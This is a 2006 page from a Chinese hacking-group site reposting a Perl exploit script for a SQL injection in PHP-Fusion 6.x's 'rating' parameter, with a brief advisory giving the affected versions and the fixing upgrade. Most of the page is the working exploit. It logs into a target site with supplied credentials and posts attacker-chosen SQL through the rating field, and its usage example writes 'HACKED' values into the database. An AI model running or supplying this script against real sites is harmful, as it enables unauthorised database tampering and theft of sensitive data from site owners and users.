PHP-Fusion 6.x “rating” Parameter Handling Remote SQL Injection Exploit || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 黑客技术 >> Exploit >> 文章正文	用户登录新用户注册

PHP-Fusion 6.x “rating” Parameter Handling Remote SQL Injection Exploit

热

【字体：小大】

PHP-Fusion 6.x “rating” Parameter Handling Remote SQL Injection Exploit

作者：佚名文章来源：CnXHacker.Net 点击数：更新时间：2006-10-29

------------------------------------------------------------------------------
名称：PHP-Fusion 6.x "rating" Parameter Handling Remote SQL Injection Exploit
漏洞资料：不详
危险程度：一般
影响范围：PHP-Fusion v6.00.300 以及之前版本
解决办法：升级到PHP-Fusion v6.00.301
相关介绍：PHP-Fusion 是一款协作管理事务安排应用程序，由于多个脚本不充分过滤用户提交的URI，远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。

------------------------------------------------------------------------------

#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[krasza@gmail.com]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%EA');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}

文章录入：IceRiver 责任编辑：admin

上一篇文章： Cisco PIX Spoofed TCP SYN Packets Handling Remote Denial of Service Exploit

下一篇文章： phpBB = 2.0.17 “signature_bbcode_uid” Remote Command Execution Exploit

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				HP-UX get_system_info的工具 iPhone“越狱” 中国黑客逼得黑客隐藏PHP文件后门的技巧 Cisco 7940 Phone SIP 消息远 iPhone遭美17岁少年解锁黑客美国高中生破解iPhone 移植到苹果周二发补丁　iPhone也出安全问题？苹果iPhone放出1. 安全公司发现iPhone严重安全开源PHP 4支持今年底结束升

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM